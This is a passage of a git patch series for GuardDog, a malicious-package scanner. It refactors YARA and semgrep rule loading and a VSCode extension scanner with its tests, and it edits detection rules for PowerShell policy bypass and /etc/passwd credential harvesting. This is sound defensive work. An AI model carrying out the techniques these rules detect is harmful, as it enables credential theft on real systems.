_invoke_semgrep(self, target: str, rules: Iterable[str]): try: SEMGREP_MAX_TARGET_BYTES = int( - os.getenv( - "GUARDDOG_SEMGREP_MAX_TARGET_BYTES", - MAX_BYTES_DEFAULT)) + os.getenv("GUARDDOG_SEMGREP_MAX_TARGET_BYTES", MAX_BYTES_DEFAULT)) SEMGREP_TIMEOUT = int( os.getenv("GUARDDOG_SEMGREP_TIMEOUT", SEMGREP_TIMEOUT_DEFAULT)) cmd = ["semgrep"] @@ -318,11 +316,7 @@ def _invoke_semgrep(self, target: str, rules: Iterable[str]): cmd.append(f"--max-target-bytes={SEMGREP_MAX_TARGET_BYTES}") cmd.append(target) log.debug(f"Invoking semgrep with command line: {' '.join(cmd)}") - result = subprocess.run( - cmd, - capture_output=True, - check=True, - encoding="utf-8") + result = subprocess.run(cmd, capture_output=True, check=True, encoding="utf-8") return json.loads(str(result.stdout)) except FileNotFoundError: raise Exception("unable to find semgrep binary") diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index ad00f8aa..197ec585 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -23,7 +23,7 @@ class SourceCodeRule: id: str file: str description: str - ecosystem: ECOSYSTEM + ecosystem: Optional[ECOSYSTEM] # None means "any ecosystem" @dataclass @@ -44,8 +44,7 @@ class SempgrepRule(SourceCodeRule): def get_sourcecode_rules( - ecosystem: ECOSYSTEM, kind: Optional[type] = None -) -> Iterable[SourceCodeRule]: + ecosystem: ECOSYSTEM, kind: Optional[type] = None) -> Iterable[SourceCodeRule]: """ This function returns the source code rules for a given ecosystem and kind. Args: @@ -55,7 +54,8 @@ def get_sourcecode_rules( for rule in SOURCECODE_RULES: if kind and not isinstance(rule, kind): continue - if rule.ecosystem != ecosystem: + # Include rules that match the specific ecosystem OR rules that apply to any ecosystem (None) + if rule.ecosystem is not None and rule.ecosystem != ecosystem: continue yield rule @@ -113,22 +113,22 @@ def get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' - rule_ecosystems = [] + # Determine ecosystem based on filename prefix if file_name.startswith("extension_"): - rule_ecosystems = [ECOSYSTEM.EXTENSION] + rule_ecosystem = ECOSYSTEM.EXTENSION else: - # If no specific ecosystem prefix, default to all ecosystems - rule_ecosystems = [ECOSYSTEM.PYPI, ECOSYSTEM.NPM, ECOSYSTEM.GO, ECOSYSTEM.GITHUB_ACTION, ECOSYSTEM.EXTENSION] + # If no specific ecosystem prefix, apply to any ecosystem + rule_ecosystem = None with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) rule_description = "" if match: rule_description = match.group(1) - for ecosystem in rule_ecosystems: - SOURCECODE_RULES.append(YaraRule( - id=rule_id, - file=file_name, - description=rule_description, - ecosystem=ecosystem - )) + + SOURCECODE_RULES.append(YaraRule( + id=rule_id, + file=file_name, + description=rule_description, + ecosystem=rule_ecosystem + )) diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py index a5546660..e0360e0c 100644 --- a/guarddog/scanners/extension_scanner.py +++ b/guarddog/scanners/extension_scanner.py @@ -17,6 +17,7 @@ "Accept": "application/json;api-version=3.0-preview.1" } MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE = "Microsoft.VisualStudio.Services.VSIXPackage" +VSIX_FILE_EXTENSION = ".vsix" class ExtensionScanner(PackageScanner): @@ -39,14 +40,10 @@ def download_and_get_package_info(self, Returns: Tuple of (extension metadata(manifest and marketplace) info, extracted_path) """ - marketplace_metadata, vsix_url = self._get_marketplace_info_and_url( - package_name, version) + marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) - file_extension = ".vsix" - vsix_path = os.path.join( - directory, package_name.replace( - "/", "-") + file_extension) - extracted_path = vsix_path.removesuffix(file_extension) + vsix_path = os.path.join(directory, package_name.replace("/", "-") + VSIX_FILE_EXTENSION) + extracted_path = vsix_path.removesuffix(VSIX_FILE_EXTENSION) log.debug(f"Downloading VSCode extension from {vsix_url}") @@ -63,7 +60,9 @@ def download_and_get_package_info(self, return combined_metadata, extracted_path def _get_marketplace_info_and_url( - self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: + self, + package_name: str, + version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: """Get marketplace metadata and VSIX download URL""" payload = { "filters": [ @@ -84,21 +83,20 @@ def _get_marketplace_info_and_url( headers=MARKETPLACE_HEADERS, json=payload) - if response.status_code != 200: - raise Exception( - f"Received status code: {response.status_code} from VSCode Marketplace") + response.raise_for_status() data = response.json() if not data.get("results") or not data["results"][0].get("extensions"): - raise Exception( + raise ValueError( f"Extension {package_name} not found in marketplace") extension_info = data["results"][0]["extensions"][0] versions = extension_info.get("versions", []) if not versions: - raise Exception("No versions available for this extension") + raise ValueError( + f"No versions available for this extension: {package_name}") target_version = None if version is None: @@ -110,20 +108,20 @@ def _get_marketplace_info_and_url( target_version = v break if target_version is None: - raise Exception(f"Version {version} not found for extension") + raise ValueError( + f"Version {version} not found for extension: {package_name}") # Extract download URL files = target_version.get("files", []) vsix_url = None for file_info in files: - if file_info.get( - "assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: + if file_info.get("assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: vsix_url = file_info.get("source") break if not vsix_url: - raise Exception( - "No VSIX download link available for this extension") + raise ValueError( + f"No VSIX download link available for this extension: {package_name}") # Extract statistics from the statistics array stats = {stat["statisticName"]: stat["value"] @@ -132,15 +130,13 @@ def _get_marketplace_info_and_url( # TODO: it might be interesting to add heuristics regarding the rating # cound and the weghtedRating (see the ranking algo hack) marketplace_metadata = { - "extensionName": extension_info.get( - "extensionName", ""), "flags": extension_info.get( - "flags", []), "download_count": int( - stats.get( - "downloadCount", 0)), "publisher": extension_info.get( - "publisher", {}), "publisher_flags": extension_info.get( - "publisher_flags", ""), "publisher_domain": extension_info.get( - "domain", ""), "publisher_isDomainVerified": extension_info.get( - "publisher_isDomainVerified", False), } + "extensionName": extension_info.get("extensionName", ""), + "flags": extension_info.get("flags", []), + "download_count": int(stats.get("downloadCount", 0)), + "publisher": extension_info.get("publisher", {}), + "publisher_flags": extension_info.get("publisher_flags", ""), + "publisher_domain": extension_info.get("domain", ""), + "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), } return marketplace_metadata, vsix_url @@ -165,13 +161,12 @@ def _extract_manifest_metadata(self, extracted_path: str) -> dict: manifest_data = json.load(f) log.debug( f"Successfully parsed package.json with {len(manifest_data)} keys") - except (json.JSONDecodeError, IOError) as e: + except Exception as e: log.warning( f"Failed to read manifest from {package_json_path}: {e}") return {} - registered_commands = manifest_data.get( - "contributes", {}).get("commands", []) + registered_commands = manifest_data.get("contributes", {}).get("commands", []) extracted_metadata = { "name": manifest_data.get("name", ""), "displayName": manifest_data.get("displayName", ""), From 1fdda8883abbd49e36a11791168817152fca3001 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Fri, 18 Jul 2025 15:48:55 +0200 Subject: [PATCH 5/7] nits ... --- guarddog/analyzer/sourcecode/__init__.py | 1 + 1 file changed, 1 insertion(+) diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index 197ec585..d3e6b569 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -114,6 +114,7 @@ def get_sourcecode_rules( description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' # Determine ecosystem based on filename prefix + rule_ecosystem: Optional[ECOSYSTEM] if file_name.startswith("extension_"): rule_ecosystem = ECOSYSTEM.EXTENSION else: From 54b72e30e54866d68b1f9249e81792d033617585 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Mon, 21 Jul 2025 11:16:53 +0200 Subject: [PATCH 6/7] implement requested changes --- guarddog/analyzer/sourcecode/__init__.py | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index d3e6b569..86af3674 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -11,10 +11,13 @@ current_dir = pathlib.Path(__file__).parent.resolve() +EXTENSION_YARA_PREFIX = "extension_" # These data class aim to reduce the spreading of the logic # Instead of using the a dict as a structure and parse it difffently # depending on the type + + @dataclass class SourceCodeRule: """ @@ -114,12 +117,7 @@ def get_sourcecode_rules( description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' # Determine ecosystem based on filename prefix - rule_ecosystem: Optional[ECOSYSTEM] - if file_name.startswith("extension_"): - rule_ecosystem = ECOSYSTEM.EXTENSION - else: - # If no specific ecosystem prefix, apply to any ecosystem - rule_ecosystem = None + rule_ecosystem: Optional[ECOSYSTEM] = ECOSYSTEM.EXTENSION if file_name.startswith(EXTENSION_YARA_PREFIX) else None with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) From e39c0ec44f9150223edd440ac62a40a3c945656d Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Tue, 22 Jul 2025 16:50:00 +0200 Subject: [PATCH 7/7] remove credits in yara rules| remove DTO structures in extension_scanner --- .../extension_powershell_policy_bypass.yar | 1 - ...tension_suspicious_passwd_access_linux.yar | 1 - guarddog/scanners/extension_scanner.py | 100 +++--------------- tests/core/test_extension_scanner.py | 51 +++------ 4 files changed, 30 insertions(+), 123 deletions(-) diff --git a/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar index 926757a9..508df247 100644 --- a/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar +++ b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar @@ -2,7 +2,6 @@ rule DETECT_FILE_powershell_policy_bypass { meta: author = "T HAMDOUNI, Datadog" - credits = "" description = "Detects suspicious read access to /etc/passwd file, which is often targeted by malware for credential harvesting" strings: diff --git a/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar index 76ffe20f..72930cb5 100644 --- a/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar +++ b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar @@ -2,7 +2,6 @@ rule DETECT_FILE_suspicious_passwd_access_linux { meta: author = "T HAMDOUNI, Datadog" - credits = "" description = "Detects suspicious read access to /etc/passwd file, which is often targeted by malware for credential harvesting" strings: diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py index e0360e0c..51eead9e 100644 --- a/guarddog/scanners/extension_scanner.py +++ b/guarddog/scanners/extension_scanner.py @@ -1,4 +1,3 @@ -import json import logging import os import typing @@ -19,6 +18,14 @@ MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE = "Microsoft.VisualStudio.Services.VSIXPackage" VSIX_FILE_EXTENSION = ".vsix" +# VSCode Marketplace API filter types +# FilterType 7 = publisherName.extensionName (search by exact extension identifier) +MARKETPLACE_FILTER_TYPE_EXTENSION_NAME = 7 + +# VSCode Marketplace API flags (bitwise combination) +# 446 = IncludeVersions | IncludeFiles | IncludeMetadata +MARKETPLACE_FLAGS_FULL_METADATA = 446 + class ExtensionScanner(PackageScanner): def __init__(self) -> None: @@ -38,9 +45,9 @@ def download_and_get_package_info(self, version: Specific version or default to latest Returns: - Tuple of (extension metadata(manifest and marketplace) info, extracted_path) + Tuple of (marketplace API response, extracted_path) """ - marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) + marketplace_data, vsix_url = self._get_marketplace_info_and_url(package_name, version) vsix_path = os.path.join(directory, package_name.replace("/", "-") + VSIX_FILE_EXTENSION) extracted_path = vsix_path.removesuffix(VSIX_FILE_EXTENSION) @@ -49,15 +56,7 @@ def download_and_get_package_info(self, self.download_compressed(vsix_url, vsix_path, extracted_path) - manifest_metadata = self._extract_manifest_metadata(extracted_path) - - combined_metadata = { - "marketplace": marketplace_metadata, - "manifest": manifest_metadata, - "source": "remote" - } - - return combined_metadata, extracted_path + return marketplace_data, extracted_path def _get_marketplace_info_and_url( self, @@ -69,13 +68,13 @@ def _get_marketplace_info_and_url( { "criteria": [ { - "filterType": 7, + "filterType": MARKETPLACE_FILTER_TYPE_EXTENSION_NAME, "value": package_name } ] } ], - "flags": 958 + "flags": MARKETPLACE_FLAGS_FULL_METADATA } response = requests.post( @@ -123,64 +122,7 @@ def _get_marketplace_info_and_url( raise ValueError( f"No VSIX download link available for this extension: {package_name}") - # Extract statistics from the statistics array - stats = {stat["statisticName"]: stat["value"] - for stat in extension_info.get("statistics", [])} - # ... and the marketplace metadata - # TODO: it might be interesting to add heuristics regarding the rating - # cound and the weghtedRating (see the ranking algo hack) - marketplace_metadata = { - "extensionName": extension_info.get("extensionName", ""), - "flags": extension_info.get("flags", []), - "download_count": int(stats.get("downloadCount", 0)), - "publisher": extension_info.get("publisher", {}), - "publisher_flags": extension_info.get("publisher_flags", ""), - "publisher_domain": extension_info.get("domain", ""), - "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), } - - return marketplace_metadata, vsix_url - - def _extract_manifest_metadata(self, extracted_path: str) -> dict: - """Extract metadata from the extension's package.json manifest""" - - log.debug(f"Starting manifest extraction from: {extracted_path}") - - package_json_path = None - for root, dirs, files in os.walk(extracted_path): - if "package.json" in files: - package_json_path = os.path.join(root, "package.json") - break - - if package_json_path is None: - log.warning(f"No package.json found in {extracted_path}") - return {} - - log.debug(f"Found package.json at: {package_json_path}") - try: - with open(package_json_path, 'r', encoding='utf-8') as f: - manifest_data = json.load(f) - log.debug( - f"Successfully parsed package.json with {len(manifest_data)} keys") - except Exception as e: - log.warning( - f"Failed to read manifest from {package_json_path}: {e}") - return {} - - registered_commands = manifest_data.get("contributes", {}).get("commands", []) - extracted_metadata = { - "name": manifest_data.get("name", ""), - "displayName": manifest_data.get("displayName", ""), - "description": manifest_data.get("description", ""), - "version": manifest_data.get("version", ""), - "publisher": manifest_data.get("publisher", ""), - "repository": manifest_data.get("repository", {}), - "activationEvents": manifest_data.get("activationEvents", []), - "categories": manifest_data.get("categories", []), - "registeredCommands": registered_commands, - } - - log.debug(f"Extracted manifest metadata: {extracted_metadata}") - return extracted_metadata + return data, vsix_url def scan_local(self, path: str, rules=None, callback: typing.Callable[[dict], None] = noop) -> dict: """ @@ -194,21 +136,11 @@ def scan_local(self, path: str, rules=None, callback: typing.Callable[[dict], No Returns: Scan results """ - # Extract manifest metadata from the extension directory - manifest_metadata = self._extract_manifest_metadata(path) - - # For local directory scanning, only use manifest metadata - package_info = { - "marketplace": {}, # Empty for local scans - "manifest": manifest_metadata, - "source": "local" - } - if rules is not None: rules = set(rules) - # Use full analyze method to include both metadata and sourcecode analysis - results = self.analyzer.analyze(path, package_info, rules) + # Use only sourcecode analysis for local scans, consistent with other ecosystems + results = self.analyzer.analyze_sourcecode(path, rules=rules) callback(results) return results diff --git a/tests/core/test_extension_scanner.py b/tests/core/test_extension_scanner.py index 9c533417..11041148 100644 --- a/tests/core/test_extension_scanner.py +++ b/tests/core/test_extension_scanner.py @@ -23,19 +23,15 @@ def test_download_and_get_package_info(): break assert package_json_found, "package.json should exist in the extracted extension" - assert "manifest" in data - assert "marketplace" in data - assert data["source"] == "remote" + # data now contains raw marketplace API response + assert "results" in data + assert len(data["results"]) > 0 + assert "extensions" in data["results"][0] + assert len(data["results"][0]["extensions"]) > 0 - marketplace = data["marketplace"] - assert "extensionName" in marketplace - assert "download_count" in marketplace - assert "publisher" in marketplace - - manifest = data["manifest"] - assert "name" in manifest - assert "version" in manifest - assert "publisher" in manifest + extension = data["results"][0]["extensions"][0] + assert "extensionName" in extension + assert "publisher" in extension def test_download_and_get_package_info_with_version(): @@ -45,8 +41,12 @@ def test_download_and_get_package_info_with_version(): assert path assert path.endswith("/gerane.Theme-FlatlandMonokai") - manifest = data["manifest"] - assert "version" in manifest + # data now contains raw marketplace API response + assert "results" in data + assert len(data["results"]) > 0 + extension = data["results"][0]["extensions"][0] + assert "versions" in extension + assert len(extension["versions"]) > 0 # Note: We're using a relatively stable extension that hasn't been updated in a long while @@ -101,26 +101,3 @@ def test_scan_local_extension_directory(): assert "issues" in result assert "results" in result - -def test_extract_manifest_metadata_nested_package_json(): - scanner = ExtensionScanner() - - with tempfile.TemporaryDirectory() as tmpdirname: - nested_dir = os.path.join(tmpdirname, "some", "nested", "path") - os.makedirs(nested_dir) - - package_json = { - "name": "nested-extension", - "version": "2.0.0", - "publisher": "nested-publisher" - } - - package_json_path = os.path.join(nested_dir, "package.json") - with open(package_json_path, 'w') as f: - json.dump(package_json, f) - - manifest = scanner._extract_manifest_metadata(tmpdirname) - - assert manifest["name"] == "nested-extension" - assert manifest["version"] == "2.0.0" - assert manifest["publisher"] == "nested-publisher" \ No newline at end of file